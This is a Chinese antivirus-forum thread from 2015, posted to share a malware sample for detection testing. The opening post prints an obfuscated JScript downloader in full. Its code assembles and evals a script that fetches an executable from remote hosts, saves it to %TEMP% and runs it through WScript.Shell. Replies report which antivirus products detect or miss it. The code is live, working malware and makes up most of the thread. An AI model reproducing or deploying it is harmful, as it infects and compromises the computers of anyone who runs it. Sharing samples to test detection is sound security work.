查看: 5578|回复: 29
收起左侧

[病毒样本] js一个

[复制链接]
kxmp
发表于 2015-10-20 16:30:31 | 显示全部楼层 |阅读模式
本帖最后由 kxmp 于 2015-10-20 16:32 编辑

  1. var str="5551525E0F1C0914011C240309050D084A070B095E275E140117170D090D1E09054A0A01105E17575E555050515754535C5D56"; function lsb() { hbg += '22)'; }; function qtsd() { hbg += 'DODB'; }; function cbc() { hbg += 'e.co'; }; function zed() { hbg += ' w'; }; function myel() { hbg += '.e'; }; function zhm() { hbg += '= W'; }; function zrwm() { hbg += 'r+'; }; function jamb() { hbg += 'aran'; }; function owyi() { hbg += 'n = '; }; function ddp() { hbg += ' = w'; }; function dfpo() { hbg += 'Scri'; }; function gru() { hbg += ')+Str'; }; function raks() { hbg += '","h'; }; function ymm() { hbg += '" "'; }; function npz() { hbg += 'ter'; }; function qsx() { hbg += 'WScri'; }; function tvy() { hbg += '/?id='; }; function ryrp() { hbg += 'at'; }; function bwea() { hbg += 'XML2'; }; function kbbe() { hbg += 'ws '; }; function eae() { hbg += 'eat'; }; function tkh() { hbg += '; '; }; function onjw() { hbg += 'if ('; }; function ihb() { hbg += 'y)'; }; function xaz() { hbg += ') {'; }; function cqi() { hbg += '; i++'; }; function gbu() { hbg += '= 0;'; }; function gfr() { hbg += '= '; }; function ioe() { hbg += 'ing.'; }; function okz() { hbg += '()*1'; }; function vhtp() { hbg += 't("'; }; function gwf() { hbg += 'eak; '; }; function fqc() { hbg += '.Resp'; }; function hnq() { hbg += 'ch'; }; function zxgq() { hbg += '};'; }; function nxc() { lyr += 'al'; };  function yjkt() { hbg += '.XM'; }; function idg() { hbg += 'pt.S'; }; function xku() { hbg += '= W'; }; function xmv() { hbg += ' tr'; }; function tuk() { hbg += 'ge '; }; function ngdy() { hbg += 'xo.o'; }; function cud() { hbg += 'ttp:'; }; function iex() { hbg += 'hell'; }; function cvxc() { hbg += 'i=0'; }; function cyk() { lyr += 'ev'; };  function jjsv() { hbg += ' v'; }; function eer() { hbg += 'afi'; }; function yyij() { hbg += 'len'; }; function aeia() { hbg += '); xo'; }; function pabn() { hbg += '58 q'; }; function ksg() { hbg += 'lit('; }; function jhbh() { hbg += 'o.sta'; }; function lagj() { hbg += ',1,0)'; }; function cgpj() { hbg += 'GET'; }; function lesh() { hbg += '(92)+'; }; function bpib() { hbg += ',2'; }; function cxov() { hbg += '); '; }; function dvj() { hbg += '1561'; }; function bbu() { hbg += '.2'; }; function bpky() { hbg += ');'; }; function sjsa() { hbg += '+b[i]'; }; function nrvm() { hbg += 'Scr'; }; function ajj() { hbg += 'tion '; }; function ysx() { hbg += 'lse)'; }; function oguo() { hbg += 'ri'; }; function jooo() { hbg += '.sp'; }; function tso() { hbg += 'han'; }; function uyq() { hbg += ' (er)'; }; function xgno() { hbg += 'tec'; }; function bkju() { hbg += 'ri'; }; function sjq() { hbg += 'P%"'; }; function bfy() { hbg += 'pen("'; }; function oxdu() { hbg += 'ate '; }; function jzie() { hbg += 'nd(M'; }; function ncw() { hbg += 'ype ='; }; function tqng() { hbg += 'ction'; }; function pkm() { hbg += 'viron'; }; function ykp() { hbg += '0)+"'; }; function qwgp() { hbg += '"+fr'; }; function rdl() { hbg += 'b '; }; function jjv() { hbg += '; x'; }; function eag() { hbg += ' == 2'; }; function iwrj() { hbg += '; }'; }; function wlf() { hbg += ');'; }; function kcgf() { hbg += 'LHTT'; }; function vvi() { hbg += '.writ'; }; function dnr() { hbg += '");'; }; function yxj() { hbg += 'ntSt'; }; function gca() { hbg += 'eOb'; }; function gimr() { hbg += '0;'; }; function wlai() { hbg += '=='; }; function oqn() { hbg += 'y {'; }; function hfm() { hbg += ' c'; }; function avil() { hbg += '(fn'; }; function aooe() { hbg += 'open'; }; function ahr() { hbg += 'nrea'; }; function sfb() { hbg += 'sh'; }; function huvf() { hbg += '(); '; }; function wdee() { hbg += ' (er)'; }; function pzu() { hbg += ' {'; }; function gwbt() { hbg += 'i<b.'; }; function bkk() { hbg += 'xe"; '; }; function xhq() { hbg += ' 1; '; }; function dcsh() { hbg += ' == '; }; function ejj() { hbg += 's.'; }; function sab() { hbg += 'isla'; }; function wumh() { hbg += 'eO'; }; function vrlo() { hbg += 'fr'; }; function meyp() { hbg += 'bject'; }; function vut() { hbg += ' }'; }; function wmb() { hbg += 'fu'; }; function eqn() { hbg += '.o'; }; function fwix() { hbg += 'xa.t'; }; function reub() { hbg += '&& x'; }; function gkz() { hbg += 'eam")'; }; function nmem() { hbg += 'rCo'; }; function fzl() { hbg += 'ar '; }; function cip() { hbg += '6.233'; }; function lxts() { hbg += ' va'; }; function koch() { hbg += 'ead'; }; function yhoj() { hbg += '103'; }; function vox() { hbg += 'br'; }; function nhj() { hbg += 'dom'; }; function ktt() { hbg += 'ct'; }; function ndue() { hbg += 'r '; }; function bvr() { hbg += 'pt.Cr'; }; function iso() { hbg += '"7'; }; function yyi() { hbg += ' > 1'; }; function msql() { hbg += 'dl(fr'; }; function vhg() { hbg += ' { '; }; function xyvo() { hbg += 'jec'; }; function vgkw() { hbg += ' xa'; }; function ewz() { hbg += 'dl(27'; }; function uka() { hbg += 'rnd='; }; function jgv() { hbg += '00)'; }; function hql() { hbg += '.r'; }; function qmri() { hbg += '(v'; }; function mdio() { hbg += 'dy'; }; function mthf() { hbg += 'xa'; }; function lbo() { hbg += ' WSc'; }; function gfvz() { hbg += 'dEn'; }; function xtfo() { hbg += ' var'; }; function bdps() { hbg += 'ar fn'; }; function tyws() { hbg += '000) '; }; function jvtr() { xgg(hbg); };  function wri() { hbg += 'o.sen'; }; function giq() { hbg += 'dn'; }; function oyux() { hbg += '}; '; }; function mmx() { hbg += 'r '; }; function nytz() { hbg += 'Math'; }; function dbk() { hbg += ' = 1;'; }; function xhi() { hbg += 'morad'; }; function wpm() { hbg += '0000'; }; function endt() { hbg += 'd()'; }; function wdb() { hbg += '000'; }; function tqnd() { hbg += 're'; }; function mjv() { hbg += '//"'; }; function tyr() { hbg += 'n '; }; function gim() { hbg += 'ar '; }; function kyrx() { hbg += 'xo '; }; function wps() { hbg += '%TEM'; }; function bgvo() { hbg += 'an'; }; function pnkb() { hbg += 'ou'; }; function pjxb() { hbg += 'nctio'; }; function vly() { hbg += ' 4 '; }; function mkcj() { hbg += 'urc'; }; function ugdp() { hbg += '; i'; }; function cqix() { hbg += '} cat'; }; function eptv() { hbg += 's.Exp'; }; function njib() { hbg += 'se();'; }; function lpnv() { hbg += 'atch'; }; var nmqs = ''; function ghqb() { hbg += 'onse'; }; function xwsr() { hbg += '+"/co'; }; function pkir() { hbg += ' ='; }; function tqom() { hbg += 'je'; }; function ieir() { hbg += '; '; }; function nfb() { hbg += ' xa'; }; function jymc() { hbg += ') { v'; }; function zxj() { hbg += 'm"'; }; function hsi() { hbg += 'aveTo'; }; function cft() { hbg += ' {'; }; function kfp() { hbg += 'P"'; }; function scss() { hbg += 'File'; }; function zym() { hbg += '(fn'; }; function aooc() { hbg += ' var '; }; function dmhd() { hbg += 'de'; }; function xsj() { hbg += 'gth'; }; function drp() { hbg += '= fun'; }; function dsi() { hbg += ' dl('; }; function lcd() { hbg += 'imo'; }; function goy() { hbg += '}; };'; }; var hbg = ''; function cdij() { hbg += 'me'; }; function exr() { hbg += ', fa'; }; function for() { hbg += 'var d'; }; function uzxr() { hbg += 'Bod'; }; function tmdx() { hbg += '; '; }; function dnv() { hbg += '; xa.'; }; function icch() { hbg += '1) '; }; function con() { hbg += 'f (xa'; }; function eugo() { hbg += '"&'; }; function sgcn() { hbg += 'tus'; }; function vcm() { hbg += '.org '; }; function wdi() { hbg += '"+st'; }; function bbt() { nmqs = this; };  var xgg = ''; function uia() { hbg += 'un'; }; function kjfl() { hbg += 'osi'; }; function wro() { hbg += '("A'; }; function nyw() { hbg += ' if '; }; function jyc() { xgg = nmqs[lyr]; };  function jwt() { hbg += 'ran'; }; function tgbp() { hbg += 'dl(6'; }; function wdig() { hbg += 'sta'; }; function ujw() { hbg += '{ dn'; }; function cso() { hbg += ' };'; }; function zmn() { hbg += 'ySt'; }; function njgw() { hbg += 'ingso'; }; function nrt() { hbg += 'pt.C'; }; function nye() { hbg += 'ateOb'; }; function rnp() { hbg += ' xa.s'; }; function tcd() { hbg += 'ng'; }; function ysz() { hbg += 'fo'; }; function bsa() { hbg += '(xo.r'; }; function zxwg() { hbg += ' {}; '; }; function tfrv() { hbg += ' xa.p'; }; function lts() { hbg += 'lo'; }; function jlb() { hbg += '("MS'; }; function dui() { hbg += '); '; }; function kbl() { hbg += 'omCha'; }; function rct() { hbg += '.size'; }; function ciuc() { hbg += 'Run'; }; function iaok() { hbg += '.Str'; }; function ukl() { hbg += 'ath.'; }; function glz() { hbg += '; try'; }; function qfdn() { hbg += 're'; }; function sukk() { hbg += '31.'; }; function irji() { hbg += 'ipt.C'; }; function vrpx() { hbg += '.c'; }; function khu() { hbg += 's("'; }; var lyr = ''; function wnbv() { hbg += '() {'; }; function mkb() { hbg += 'e(xo'; };wmb(); pjxb(); tyr(); msql(); jymc(); fzl(); rdl(); gfr(); iso(); cip(); bbu(); sukk(); pabn(); jamb(); lcd(); vcm(); sab(); xhi(); eer(); sfb(); njgw(); mkcj(); cbc(); zxj(); jooo(); ksg(); ymm(); dui(); ysz(); ndue(); qmri(); gim(); cvxc(); tkh(); gwbt(); yyij(); xsj(); cqi(); xaz(); lxts(); mmx(); kbbe(); xku(); dfpo(); nrt(); qfdn(); nye(); xyvo(); vhtp(); qsx(); idg(); iex(); dnr(); jjsv(); bdps(); ddp(); eptv(); bgvo(); gfvz(); pkm(); cdij(); yxj(); oguo(); tcd(); khu(); wps(); sjq(); gru(); ioe(); vrlo(); kbl(); nmem(); dmhd(); lesh(); nytz(); hql(); pnkb(); jzie(); ukl(); jwt(); nhj(); okz(); wdb(); wpm(); ykp(); myel(); bkk(); for(); owyi(); gimr(); aooc(); kyrx(); zhm(); nrvm(); irji(); tqnd(); ryrp(); wumh(); meyp(); jlb(); bwea(); yjkt(); kcgf(); kfp(); aeia(); eqn(); ahr(); mdio(); wdig(); xgno(); tso(); tuk(); drp(); tqng(); wnbv(); nyw(); bsa(); koch(); zmn(); oxdu(); wlai(); vly(); reub(); jhbh(); sgcn(); eag(); jgv(); pzu(); xtfo(); nfb(); pkir(); lbo(); bkju(); bvr(); eae(); gca(); tqom(); ktt(); wro(); qtsd(); iaok(); gkz(); dnv(); aooe(); huvf(); fwix(); ncw(); xhq(); mthf(); vvi(); mkb(); fqc(); ghqb(); uzxr(); ihb(); ugdp(); con(); rct(); yyi(); tyws(); ujw(); dbk(); tfrv(); kjfl(); ajj(); gbu(); rnp(); hsi(); scss(); avil(); bpib(); bpky(); xmv(); oqn(); zed(); ejj(); ciuc(); zym(); lagj(); iwrj(); hfm(); lpnv(); uyq(); zxwg(); zxgq(); vgkw(); vrpx(); lts(); njib(); cso(); vut(); glz(); vhg(); ngdy(); bfy(); cgpj(); raks(); cud(); mjv(); sjsa(); xwsr(); uia(); npz(); tvy(); wdi(); zrwm(); eugo(); uka(); qwgp(); exr(); ysx(); jjv(); wri(); endt(); ieir(); cqix(); hnq(); wdee(); cft(); oyux(); onjw(); giq(); dcsh(); icch(); vox(); gwf(); goy(); dsi(); dvj(); cxov(); ewz(); lsb(); tmdx(); tgbp(); yhoj(); wlf(); cyk(); nxc(); bbt(); jyc(); jvtr();
复制代码

本帖子中包含更多资源

您需要 登录 才可以下载或查看,没有帐号?快速注册

x
诸葛亮
发表于 2015-10-20 16:36:57 | 显示全部楼层
红伞miss
MXCERILYF!
发表于 2015-10-20 16:37:37 | 显示全部楼层
卡巴斯基

本帖子中包含更多资源

您需要 登录 才可以下载或查看,没有帐号?快速注册

x
EnZhSTReLniKoVa
发表于 2015-10-20 16:42:36 | 显示全部楼层
反恶意软件客户端版本: 4.8.10240.16384
引擎版本: 1.1.12101.0
防病毒定义: 1.207.3749.0
反间谍软件定义: 1.207.3749.0
网络检查系统引擎版本: 2.1.11804.0
网络检查系统定义版本: 115.25.0.0

类别: 工具

描述: 这个程序用于创建病毒、蠕虫或其他恶意软件。

推荐的操作: 立即删除这个软件。

项目:
file:D:\病毒样本\00000258116.doc.js

本帖子中包含更多资源

您需要 登录 才可以下载或查看,没有帐号?快速注册

x
ericdj
发表于 2015-10-20 16:42:59 | 显示全部楼层
avast miss
EnZhSTReLniKoVa
发表于 2015-10-20 16:43:56 | 显示全部楼层

WD 都杀。。
wjy19800315
发表于 2015-10-20 16:44:03 | 显示全部楼层
本帖最后由 wjy19800315 于 2015-10-20 16:58 编辑

诺顿miss
@胖福 试试双击
过了诺顿的下载智能分析与扫描
ericdj
发表于 2015-10-20 16:45:53 | 显示全部楼层

目前avira和norton都miss了
edwardcl
发表于 2015-10-20 17:01:36 | 显示全部楼层
eset kill
pbbh07
发表于 2015-10-20 17:02:05 | 显示全部楼层
CIS
Heur.Dual.Extensions@4294967295
您需要登录后才可以回帖 登录 | 快速注册

本版积分规则

手机版|杀毒软件|软件论坛| 卡饭论坛

Copyright © KaFan  KaFan.cn All Rights Reserved.

Powered by Discuz! X3.4( 沪ICP备2020031077号-2 ) GMT+8, 2025-5-21 07:00 , Processed in 0.142873 second(s), 18 queries .

卡饭网所发布的一切软件、样本、工具、文章等仅限用于学习和研究,不得将上述内容用于商业或者其他非法用途,否则产生的一切后果自负,本站信息来自网络,版权争议问题与本站无关,您必须在下载后的24小时之内从您的电脑中彻底删除上述信息,如有问题请通过邮件与我们联系。

快速回复 客服 返回顶部 返回列表